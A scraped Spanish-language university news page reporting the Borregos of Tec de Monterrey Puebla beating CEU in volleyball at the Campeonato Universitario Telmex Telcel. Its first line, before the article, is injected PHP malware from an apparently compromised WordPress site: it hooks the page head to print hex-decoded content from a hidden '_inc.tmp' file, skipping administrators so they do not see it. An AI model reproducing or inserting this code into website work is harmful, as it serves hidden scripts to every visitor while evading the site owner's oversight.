if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La Opinión Universitaria La Opinión Universitaria
Menu

 

Nuevamente fue por la vía rápida, los Borregos del Tecnológico de Monterrey campus Puebla derrotaron en tres sets corridos al CEU para llegar a 5 victorias consecutivas en el Campeonato Universitario Telmex Telcel.

Bryan Angulo fue el líder en el rubro de puntos y se mantiene en un gran nivel, 10 unidades, 9 atajadas y un bloqueo, lo convirtieron en el jugador del partido en el que Puebla impuso condiciones de manera contundente.

Iván Molano también cumplió con una actuación muy destacada y puso 9 puntos para la causa poblana, que ya se enrachó y está de regreso en la contienda tras el azaroso arranque del Campeonato Universitario Telmex Telcel.

15 – 25, 10 – 25 y 20 – 25, fueron los parciales con los que logró imponerse con relativa facilidad el Tec Puebla al CEU y tienen programado aún un partido para este día ante la Anáhuac Xalapa, para cerrar mañana enfrentando a las 10 de la mañana al representativo de la Universidad Nacional Autónoma de México.

Ya con 5 victorias en el standing, los poblanos se colocan empatados en triunfos con el tercer lugar Monterrey, con 10 puntos en la clasificación, lo que los ubica en la penúltima posición, empero en franco ascenso.

En un par de semanas llegará toda la emoción del Campeonato Universitario Telmex Telcel a Puebla, y con los Borregos en plena racha ganadora, se esperan grandes duelos en la Angelópolis que tendrá sede compartida entre la UDLAP y el Tec de Monterrey campus Puebla.

 

 

 

No comments

Deja una respuesta

Tweets recientes